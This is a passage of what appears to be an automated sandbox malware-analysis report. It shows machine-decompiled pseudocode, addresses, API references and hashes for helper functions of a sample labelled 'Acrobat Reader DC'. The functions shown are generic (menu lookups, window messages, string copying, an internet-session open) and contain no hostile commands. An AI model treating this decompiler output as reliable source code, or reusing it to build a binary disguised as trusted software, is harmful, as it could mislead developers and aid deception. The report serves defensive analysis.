										__eflags = _v52.fType & 0x00000800;
										if((_v52.fType & 0x00000800) != 0) {
											goto L23;
										} else {
											_t38 = _v52.fState;
											__eflags = _t38 & 0x00000003;
											if((_t38 & 0x00000003) == 0) {
												 *_t55 =  *_t55 | 0x00000040;
												__eflags =  *_t55;
											} else {
												 *_t55 =  *_t55 | 0x00000080;
											}
											__eflags = _t38 & 0x00008080;
											if((_t38 & 0x00008080) != 0) {
												 *_t55 =  *_t55 | 0x00000100;
												__eflags =  *_t55;
											}
											__eflags = _t38 & 0x00000008;
											if((_t38 & 0x00000008) == 0) {
												 *_t55 =  *_t55 | 0x00000004;
												__eflags =  *_t55;
											} else {
												 *_t55 =  *_t55 | 0x00000001;
											}
											__eflags = _t38 & 0x00001000;
											if((_t38 & 0x00001000) != 0) {
												 *_t55 =  *_t55 | 0x00000200;
												__eflags =  *_t55;
											}
											return 1;
										}
									}
								}
							}
						} else {
							L5:
							return 0;
						}
					}
				}
			}














                                  0x004440e6
                                  0x004440ea
                                  0x004440ed
                                  0x004440f7
                                  0x00444205
                                  0x0044420b
                                  0x00444106
                                  0x0044410a
                                  0x0044412e
                                  0x00000000
                                  0x00444111
                                  0x00444122
                                  0x00444132
                                  0x00444135
                                  0x00444135
                                  0x0044413c
                                  0x00444142
                                  0x00444144
                                  0x00000000
                                  0x00444146
                                  0x00444147
                                  0x00444151
                                  0x00444158
                                  0x00444160
                                  0x00444162
                                  0x004441fa
                                  0x004441fc
                                  0x00444202
                                  0x00444168
                                  0x00444168
                                  0x0044416d
                                  0x00444180
                                  0x00444182
                                  0x00444189
                                  0x0044418c
                                  0x00444193
                                  0x00444199
                                  0x0044419b
                                  0x004441ec
                                  0x004441f1
                                  0x004441f2
                                  0x00000000
                                  0x0044419d
                                  0x0044419d
                                  0x004441a4
                                  0x00000000
                                  0x004441a6
                                  0x004441a6
                                  0x004441a9
                                  0x004441ab
                                  0x004441b5
                                  0x004441b5
                                  0x004441ad
                                  0x004441ad
                                  0x004441ad
                                  0x004441b8
                                  0x004441bd
                                  0x004441bf
                                  0x004441bf
                                  0x004441bf
                                  0x004441c5
                                  0x004441c7
                                  0x004441ce
                                  0x004441ce
                                  0x004441c9
                                  0x004441c9
                                  0x004441c9
                                  0x004441d1
                                  0x004441d6
                                  0x004441d8
                                  0x004441d8
                                  0x004441d8
                                  0x004441e9
                                  0x004441e9
                                  0x004441a4
                                  0x0044419b
                                  0x00444162
                                  0x00444124
                                  0x00444124
                                  0x0044412b
                                  0x0044412b
                                  0x00444122
                                  0x0044410a

                                  APIs
                                  • _memset.LIBCMT ref: 00444158
                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00444193
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: InfoItemMenu_memset
                                  • String ID: 0
                                  • API String ID: 2223754486-4108050209
                                  • Opcode ID: 01492e4d25bc2bd65c26aecb51fb71c87790512efaa9bc24c35de0538d27af29
                                  • Instruction ID: 58443bb6ec7987cf46203e674686192f5cc98237d9d33e2b35fa29f462c9b90c
                                  • Opcode Fuzzy Hash: 01492e4d25bc2bd65c26aecb51fb71c87790512efaa9bc24c35de0538d27af29
                                  • Instruction Fuzzy Hash: 9631E3715002049BF720CF58DC89BAAB7A8FB99310F14451FED41D62A0EBB99990CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044835A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0044835A(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				signed int _v8;
				intOrPtr _v12;
				int _v20;
				int _v24;
				intOrPtr _v32;
				void _v48;
				void _v92;
				long _v96;
				void* _v100;
				intOrPtr _t46;
				intOrPtr _t47;
				long _t50;
				struct HWND__** _t53;
				long _t55;
				intOrPtr _t59;
				intOrPtr _t63;
				intOrPtr _t67;
				struct HWND__* _t68;
				intOrPtr _t79;
				struct HWND__* _t84;

				if(E00441AF5(0x4a8630, _a16,  &_a16,  &_v8) != 0) {
					_t63 =  *0x4a8690; // 0x0
					_t59 =  *((intOrPtr*)( *((intOrPtr*)(_t63 + _a16 * 4))));
					if( *((intOrPtr*)(_t59 + 0x1b0)) == 0) {
						goto L1;
					} else {
						_t46 =  *((intOrPtr*)(_t59 + 0x1b8));
						_v48 = 5;
						if(_t46 >= 0 ||  *((intOrPtr*)(_t59 + 0x1bc)) >= 0) {
							_v48 = 0x27;
							_v24 = 0;
							_v20 = 0;
						}
						if(_t46 >= 0) {
							_v20 = _t46;
						}
						_t47 =  *((intOrPtr*)(_t59 + 0x1bc));
						if(_t47 >= 0) {
							_v24 = _t47;
						}
						_v12 = _a8;
						_v32 = _a12;
						memcpy( &_v92,  &_v48, 0xa << 2);
						_t50 =  *(_t59 + 0x1b4);
						_v96 = 0xffff0001;
						if(_t50 != 0) {
							_v96 = _t50;
						}
						_t67 =  *0x4a86a4; // 0xa51ad0
						_t53 =  *( *(_t67 + _v8 * 4));
						_t68 = _t53[0x22];
						if(_t68 != 0x10) {
							_t84 = _t53[0xc];
						} else {
							_t84 =  *_t53;
						}
						if(_t68 != 0x10) {
							_v100 = _t53[3];
						} else {
							_v100 = 0xffff0000;
						}
						_t55 = SendMessageW(_t84, 0x1132, 0,  &_v100);
						_t79 = _a4;
						 *(_t79 + 0xc) = _t55;
						 *(_t79 + 0x30) = _t84;
						 *((short*)(_t79 + 0x80)) = SendMessageW(_t84, 0x1105, 0, 0);
						 *(_t59 + 0x1b4) =  *(_t79 + 0xc);
						return 1;
					}
				} else {
					L1:
					return 0;
				}
			}























                                  0x0044837b
                                  0x0044838b
                                  0x00448394
                                  0x0044839e
                                  0x00000000
                                  0x004483a0
                                  0x004483a0
                                  0x004483a6
                                  0x004483af
                                  0x004483b9
                                  0x004483c0
                                  0x004483c3
                                  0x004483c3
                                  0x004483c8
                                  0x004483ca
                                  0x004483ca
                                  0x004483cd
                                  0x004483d5
                                  0x004483d7
                                  0x004483d7
                                  0x004483e0
                                  0x004483e3
                                  0x004483f1
                                  0x004483f3
                                  0x004483f9
                                  0x00448402
                                  0x00448404
                                  0x00448404
                                  0x00448407
                                  0x00448413
                                  0x00448415
                                  0x0044841e
                                  0x00448424
                                  0x00448420
                                  0x00448420
                                  0x00448420
                                  0x0044842a
                                  0x00448438
                                  0x0044842c
                                  0x0044842c
                                  0x0044842c
                                  0x00448446
                                  0x0044844c
                                  0x00448459
                                  0x0044845c
                                  0x00448468
                                  0x00448471
                                  0x0044847d
                                  0x0044847d
                                  0x0044837d
                                  0x0044837d
                                  0x00448385
                                  0x00448385

                                  APIs
                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID: '
                                  • API String ID: 3850602802-1997036262
                                  • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                  • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                  • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                  • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040BD80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 78%
                                  			E0040BD80(void* __eax, signed int __ebx, intOrPtr* __ecx, void* __fp0, intOrPtr* _a4) {
				intOrPtr _v8;
				void* __edi;
				void* __esi;
				intOrPtr _t38;
				intOrPtr* _t39;
				signed int _t40;
				signed int _t41;
				signed int _t42;
				intOrPtr _t44;
				signed int _t59;
				void* _t80;
				intOrPtr* _t83;
				void* _t85;
				void* _t86;
				void* _t95;

				_t95 = __fp0;
				_t59 = __ebx;
				_push(__ecx);
				_t80 = __eax;
				_t83 = __ecx;
				if(__eax == 0) {
					L7:
					return _t83;
				}
				_t38 =  *((intOrPtr*)(_a4 + 4));
				if(__ebx >= _t38) {
					goto L7;
				}
				if(__eax != 0xffffffff) {
					__eflags = __ebx + __eax - _t38;
					if(__eflags <= 0) {
						L4:
						_t3 = _t83 + 0xc; // 0xd0558b1d
						_t39 =  *_t3;
						if( *_t39 > 1) {
							 *_t39 =  *_t39 - 1;
							_push(4);
							_t40 = E004115D7(_t80, _t83, __eflags);
							_t86 = _t85 + 4;
							__eflags = _t40;
							if(_t40 == 0) {
								_t40 = 0;
							} else {
								 *_t40 = 1;
							}
							_t17 = _t83 + 4; // 0x74000049
							 *(_t83 + 0xc) = _t40;
							_t20 = _t80 + 1; // 0x7400004a
							_t41 =  *_t17 + _t20;
							 *(_t83 + 8) = _t41;
							__eflags = _t41;
							if(__eflags == 0) {
								_t42 = 8;
							} else {
								_t42 = (_t41 + 7 >> 3) + (_t41 + 7 >> 3) + (_t41 + 7 >> 3) + (_t41 + 7 >> 3) + (_t41 + 7 >> 3) + (_t41 + 7 >> 3) + (_t41 + 7 >> 3) + (_t41 + 7 >> 3);
								__eflags = _t42;
							}
							 *(_t83 + 8) = _t42;
							_push( ~(0 | __eflags > 0x00000000) | _t42 * 0x00000002);
							_t44 = E004115D7(_t80, _t83, __eflags);
							_t29 = _t83 + 4; // 0x74000049
							_t31 =  *_t29 + 2; // 0x7400004b
							_v8 = _t44;
							E00410E60(_t44,  *_t83,  *_t29 + _t31);
							_t85 = _t86 + 0x10;
							 *_t83 = _v8;
							L6:
							_t6 = _t83 + 4; // 0x74000049
							E00410E60( *_t83 +  *_t6 * 2,  *_a4 + _t59 * 2, _t80 + _t80);
							 *(_t83 + 4) =  *(_t83 + 4) + _t80;
							_t14 = _t83 + 4; // 0x74000049
							 *((short*)( *_t83 +  *_t14 * 2)) = 0;
							goto L7;
						}
						_t4 = _t83 + 4; // 0x74000049
						E00402F00( *_t4 + _t80, _t83, _t95);
						goto L6;
					}
				}
				_t80 = _t38 - _t59;
				goto L4;
			}


















                                  0x0040bd80
                                  0x0040bd80
                                  0x0040bd83
                                  0x0040bd86
                                  0x0040bd88
                                  0x0040bd8c
                                  0x0040bde3
                                  0x0040bdea
                                  0x0040bdea
                                  0x0040bd91
                                  0x0040bd96
                                  0x00000000
                                  0x00000000
                                  0x0040bd9b
                                  0x00426cda
                                  0x00426cdc
                                  0x0040bda5
                                  0x0040bda5
                                  0x0040bda5
                                  0x0040bdab
                                  0x0040bded
                                  0x0040bdef
                                  0x0040bdf1
                                  0x0040bdf6
                                  0x0040bdf9
                                  0x0040bdfb
                                  0x0040be5e
                                  0x0040bdfd
                                  0x0040bdfd
                                  0x0040bdfd
                                  0x0040be03
                                  0x0040be06
                                  0x0040be09
                                  0x0040be09
                                  0x0040be0d
                                  0x0040be10
                                  0x0040be12
                                  0x00426ce7
                                  0x0040be18
                                  0x0040be22
                                  0x0040be22
                                  0x0040be22
                                  0x0040be26
                                  0x0040be37
                                  0x0040be38
                                  0x0040be3d
                                  0x0040be40
                                  0x0040be49
                                  0x0040be4c
                                  0x0040be54
                                  0x0040be57
                                  0x0040bdb7
                                  0x0040bdbc
                                  0x0040bdcd
                                  0x0040bdd2
                                  0x0040bdd5
                                  0x0040bddf
                                  0x00000000
                                  0x0040bddf
                                  0x0040bdad
                                  0x0040bdb2
                                  0x00000000
                                  0x0040bdb2
                                  0x00426ce2
                                  0x0040bda3
                                  0x00000000

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _memmove
                                  • String ID: Error:
                                  • API String ID: 4104443479-232661952
                                  • Opcode ID: f964171bc22d0a42f16369dbad18f2cd434c0b18babede9fc6fedef28322a13d
                                  • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                  • Opcode Fuzzy Hash: f964171bc22d0a42f16369dbad18f2cd434c0b18babede9fc6fedef28322a13d
                                  • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00444006 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00444006(int _a4, signed int _a8) {
				struct tagMENUITEMINFOW _v52;
				intOrPtr _t27;
				intOrPtr* _t29;
				signed int _t36;
				int _t39;

				_t29 = _a8;
				_t39 = _a4;
				_a8 = 0xffffffff;
				if(_t39 != 0) {
					if(_t39 == 5 || _t39 == 6) {
						return 0;
					} else {
						if(_t39 == 3 || _t39 == 4) {
							_t36 = _t39;
							goto L10;
						} else {
							if(E00434179(0x4a8710, _t39,  &_a8) != 0) {
								_t36 = _a8;
								L10:
								if( *(0x4a88c4 + _t36 * 4) == 0 || ( *(0x4a88c4 + _t36 * 4))[1] == 0) {
									goto L7;
								} else {
									_v52.cbSize = 0x30;
									E00412F40( &(_v52.fMask), 0, 0x2c);
									_v52.fMask = 4;
									if(GetMenuItemInfoW( *( *(0x4a88c4 + _t36 * 4)), _t39, 0,  &_v52) == 0) {
										goto L7;
									} else {
										 *_t29 = _v52.hSubMenu;
										return 1;
									}
								}
							} else {
								L7:
								return 0;
							}
						}
					}
				} else {
					_t27 =  *0x4a8710; // 0x8045b
					 *_t29 = _t27;
					return _t39 + 1;
				}
			}








                                  0x0044400d
                                  0x00444011
                                  0x00444014
                                  0x0044401d
                                  0x00444034
                                  0x004440dd
                                  0x00444043
                                  0x00444047
                                  0x0044406c
                                  0x00000000
                                  0x0044404e
                                  0x0044405f
                                  0x00444070
                                  0x00444073
                                  0x0044407b
                                  0x00000000
                                  0x0044408a
                                  0x00444092
                                  0x00444099
                                  0x004440a5
                                  0x004440c1
                                  0x00000000
                                  0x004440c3
                                  0x004440c8
                                  0x004440d3
                                  0x004440d3
                                  0x004440c1
                                  0x00444061
                                  0x00444061
                                  0x00444069
                                  0x00444069
                                  0x0044405f
                                  0x00444047
                                  0x0044401f
                                  0x0044401f
                                  0x00444024
                                  0x0044402e
                                  0x0044402e

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 0
                                  • API String ID: 0-4108050209
                                  • Opcode ID: 3577af1d957b7204fdd46e1a4f9341c5b1a9bc6f86c8f2c685067796396eaca7
                                  • Instruction ID: 69519e99fff9c3611eeaecbf8f45cf93f87690a028603bc06d4aa4e0618ad1d9
                                  • Opcode Fuzzy Hash: 3577af1d957b7204fdd46e1a4f9341c5b1a9bc6f86c8f2c685067796396eaca7
                                  • Instruction Fuzzy Hash: 92210D7290011457EB20DF4CEC84BEBB764F79A320F44412FEE5897290D779A854C7D9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044256C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: InternetOpen
                                  • String ID: <local>
                                  • API String ID: 2038078732-4266983199
                                  • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                  • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                  • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                  • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044CE43 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E0044CE43(void* __ecx, void* __eflags, char _a4) {
				intOrPtr _v8;
				void* __edi;
				void* __esi;
				intOrPtr _t18;
				signed int _t20;
				void* _t27;
				intOrPtr _t28;
				void* _t34;
				signed int _t35;
				void* _t38;
				signed int _t41;

				_t28 =  *((intOrPtr*)(E00432520( &_a4) + 8));
				_t18 = E00443106( &_a4);
				_v8 = _t18;
				_t20 = _t18 - 1 >> 2;
				_t41 = (4 + _t20 * 4 >> 2) + 2;
				__imp__#411(0x13, 0, _t41, _t34, _t38, _t27, __ecx);
				_t35 = _t20;
				if(_t35 == 0) {
					E00408F40(_t35,  &_a4);
					return 0;
				} else {
					_t8 = _t35 + 0x20; // 0x20
					 *((intOrPtr*)(_t35 + 0x18)) = 0x73747263;
					 *((intOrPtr*)(_t35 + 0x1c)) = _t28;
					 *((intOrPtr*)(_t35 + 0x14 + _t41 * 4)) = 0;
					E00410E60(_t8, _t28, _v8);
					E00408F40(_t35,  &_a4);
					return _t35;
				}
			}














                                  0x0044ce53
                                  0x0044ce5a
                                  0x0044ce5f
                                  0x0044ce63
                                  0x0044ce70
                                  0x0044ce78
                                  0x0044ce7e
                                  0x0044ce82
                                  0x0044cebd
                                  0x0044ceca
                                  0x0044ce84
                                  0x0044ce88
                                  0x0044ce8c
                                  0x0044ce93
                                  0x0044ce97
                                  0x0044ce9f
                                  0x0044ceaa
                                  0x0044ceb7
                                  0x0044ceb7

                                  APIs
                                  • SafeArrayCreateVector.OLEAUT32(00000013,00000000), ref: 0044CE78
                                  • _memmove.LIBCMT ref: 0044CE9F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ArrayCreateSafeVector_memmove
                                  • String ID: crts
                                  • API String ID: 564309351-3724388283
                                  • Opcode ID: 7e754992b260b6e72dbf0ba7770114a121c02481734c5380321d1baa9379aa27
                                  • Instruction ID: ae18a0e6088bde325f2b8f87e65bbb2aaade0ee39655e70765b31d945e00dc0b
                                  • Opcode Fuzzy Hash: 7e754992b260b6e72dbf0ba7770114a121c02481734c5380321d1baa9379aa27
                                  • Instruction Fuzzy Hash: 7B0122B390010CABD700DF5AEC41E9B77A8EB84300F00412BFA08D7241EB31EA52C7E0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004321A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 87%
                                  			E004321A4(intOrPtr _a4, signed int* _a8) {
				signed char _v5;
				signed char _v6;
				signed char _v7;
				signed int _v8;
				char _v12;
				signed int _t21;
				intOrPtr _t39;

				_t39 = _a4;
				if( *((intOrPtr*)(_t39 + 0x14)) != 1) {
					E00414D04( &_v12, 1, 8,  *((intOrPtr*)(_t39 + 0x1c)));
				} else {
					E00410E60( &_v12,  *((intOrPtr*)(_t39 + 0xc)) +  *((intOrPtr*)(_t39 + 4)), 8);
				}
				 *((intOrPtr*)(_t39 + 0xc)) =  *((intOrPtr*)(_t39 + 0xc)) + 8;
				 *_a8 = (((_v8 & 0x000000ff) << 0x00000008 | _v7 & 0x000000ff) << 0x00000008 | _v6 & 0x000000ff) << 0x00000008 | _v5 & 0x000000ff;
				_v8 = 0;
				_t21 = E00414D30( &_v12, "EA06");
				asm("sbb eax, eax");
				return  ~( ~_t21);
			}










                                  0x004321ab
                                  0x004321b2
                                  0x004321d7
                                  0x004321b4
                                  0x004321c1
                                  0x004321c6
                                  0x004321eb
                                  0x00432205
                                  0x00432210
                                  0x00432214
                                  0x0043221e
                                  0x00432226

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __fread_nolock_memmove
                                  • String ID: EA06
                                  • API String ID: 1988441806-3962188686
                                  • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                  • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                  • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                  • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00442BB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00442BB4(void* __ebx, void* __fp0, intOrPtr* _a4, char _a8) {
				signed int _t7;
				void* _t12;
				signed int* _t17;
				intOrPtr _t19;
				void* _t21;
				intOrPtr* _t22;

				_t1 =  &_a8; // 0x442c75
				_t7 =  *_t1 & 0x0000ffff;
				_t22 = _a4;
				_t20 = _t22 + 8;
				_t17 = _t22 + 8;
				_t19 = 0x11;
				do {
					_t7 = 1 - _t7 * 0x53a9b4fb;
					 *_t17 = _t7;
					_t17 =  &(_t17[1]);
					_t19 = _t19 - 1;
					_t25 = _t19;
				} while (_t19 != 0);
				 *_t22 = _t19;
				 *((intOrPtr*)(_t22 + 4)) = 0xa;
				E00410E60(_t22 + 0x4c, _t20, 0x44);
				E00410E60(_t22 + 0x90, _t20, 0x44);
				_t21 = 9;
				do {
					_t12 = E00431EC8(_t25, __fp0, _t22);
					st0 = __fp0;
					_t21 = _t21 - 1;
				} while (_t21 != 0);
				return _t12;
			}









                                  0x00442bb7
                                  0x00442bb7
                                  0x00442bbc
                                  0x00442bc0
                                  0x00442bc3
                                  0x00442bc5
                                  0x00442bd4
                                  0x00442be1
                                  0x00442be3
                                  0x00442be5
                                  0x00442be8
                                  0x00442be8
                                  0x00442be8
                                  0x00442bf2
                                  0x00442bf4
                                  0x00442bfb
                                  0x00442c0a
                                  0x00442c12
                                  0x00442c18
                                  0x00442c19
                                  0x00442c1e
                                  0x00442c20
                                  0x00442c20
                                  0x00442c26

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
